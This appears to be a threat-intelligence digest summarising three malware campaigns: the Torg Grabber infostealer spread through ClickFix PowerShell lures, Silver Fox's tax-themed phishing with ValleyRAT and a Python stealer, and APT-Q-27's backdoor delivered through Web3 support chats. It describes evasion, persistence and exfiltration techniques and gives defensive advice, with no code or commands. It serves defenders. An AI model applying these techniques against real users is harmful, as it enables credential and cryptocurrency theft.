Trending Topics

Torg Grabber Infostealer Campaign: Broad-Spectrum Credential and Crypto Theft

A rapidly evolving infostealer malware campaign centered on “Torg Grabber” is targeting a wide range of sensitive data sources, with a particular emphasis on cryptocurrency wallets and browser-based credentials. The malware is distributed through ClickFix-style social engineering, where victims are tricked into executing malicious PowerShell commands via clipboard hijacking, initiating a multi-stage infection chain. Once deployed, Torg Grabber leverages advanced evasion techniques, including reflective loading, direct syscalls, and in-memory execution, to avoid detection while extracting data from 25+ browsers and over 850 extensions. Its capabilities extend beyond wallets to include password managers, two-factor authentication tools, messaging platforms, and local files, enabling comprehensive system compromise. The malware also profiles infected hosts, gathers hardware fingerprints, and continuously evolves its C2 infrastructure, with new domains registered weekly. Technically, Torg Grabber demonstrates a mature MaaS model, featuring modular architecture, operator tagging, and multiple exfiltration mechanisms that have evolved from Telegram APIs to encrypted HTTPS-based REST infrastructure. Combined with anti-analysis checks, polymorphic loaders, and scalable infrastructure, Torg Grabber represents a highly adaptable and industrialized threat capable of widespread financial and identity theft across diverse victim environments. Organizations should block execution of unauthorized PowerShell commands, restrict clipboard-based execution workflows, enforce endpoint detection for in-memory and reflective loading behaviors, and monitor for anomalous browser access and data exfiltration to prevent credential and wallet compromise.

Silver Fox Tax Audit Phishing Campaign: Transition from Modular RATs to Scalable Credential Theft

The Silver Fox intrusion set has conducted a multi-wave phishing campaign leveraging tax audit lures to achieve initial access across South Asia, demonstrating a clear evolution from espionage-capable malware toward scalable, financially motivated tooling. Early operations relied on ValleyRAT delivered via malicious PDFs impersonating government tax authorities, where hidden clickable annotations triggered ZIP downloads from cloud infrastructure. These payloads deployed DLL loaders (e.g., python311.dll) to execute ValleyRAT, enabling modular post-exploitation capabilities including keylogging, remote control, and data exfiltration. By late 2025, the campaign shifted toward abusing legitimate RMM tools signed by trusted vendors, embedding C2 parameters directly within filenames to preserve digital signatures and evade static detection. This transition expanded geographic targeting and improved operational stealth while maintaining the same tax-themed social engineering foundation. By early 2026, Silver Fox pivoted again, replacing RAT-based access with a custom Python stealer disguised as a WhatsApp backup utility, signaling a move toward high-volume credential harvesting and downstream fraud enablement. The stealer collects browser and application artifacts, stages them locally, and exfiltrates data to attacker-controlled infrastructure using spoofed user-agent strings while mimicking legitimate web services to blend network traffic. Artifacts such as WhatsAppData[.]zip and temporary lock files provide host-level indicators of compromise. The consistent use of culturally relevant tax and payroll lures underscores a stable initial access strategy, while backend tooling adapts to balance stealth, scalability, and monetization across diverse victim environments. Organizations should implement phishing-resistant MFA, block execution of unsigned or unexpected binaries from user download paths, monitor for abuse of legitimate RMM tools and anomalous filename-based C2 patterns, and deploy network detection for suspicious outbound traffic (e.g., spoofed user-agents and data exfiltration endpoints) to disrupt credential harvesting and remote access activity.

APT-Q-27 Web3 Support Impersonation Campaign: Multi-Stage Backdoor via Screenshot Lures

The APT-Q-27 threat group has launched a targeted campaign against Web3 customer support teams by weaponizing live chat interactions as an initial access vector. Attackers impersonate legitimate users and submit “screenshot” links that appear benign but deliver disguised executables (e.g., .pif files masquerading as images), exploiting Windows' default behavior of hiding file extensions. Once executed, the payload displays a decoy error image while silently initiating a multi-stage infection chain. The first-stage loader, often signed with abused EV certificates, retrieves a payload manifest from AWS S3 dead drops, enabling dynamic infrastructure rotation. Technically, the campaign deploys a sophisticated, layered execution chain culminating in a memory-resident Farfli backdoor. The loader establishes a hidden staging directory mimicking Windows Update paths, downloads multiple components, and leverages DLL sideloading through a legitimate signed binary (updat[.]exe) to evade detection. Payloads are decrypted and executed entirely in memory using shellcode and UPX-packed modules, leaving minimal forensic artifacts on disk. Persistence is achieved via registry Run keys (e.g., “SystemUpdats”) and service installation under deceptive names such as “Windows Eventn,” while additional techniques include UAC suppression, anti-debugging checks, and runtime string decryption. The final implant communicates with dozens of hardcoded C2 servers over TCP port 15628 using encrypted configurations, reflecting a mature, stealth-focused architecture optimized for long-term access and credential compromise in cryptocurrency-adjacent environments. Organizations should enforce visible file extensions, restrict execution of files received via chat platforms, implement sandboxing for all externally sourced files, monitor for anomalous AppData staging paths and registry persistence keys, and block outbound traffic on non-standard ports (e.g., TCP 15628) to disrupt backdoor communications and prevent compromise of support environments.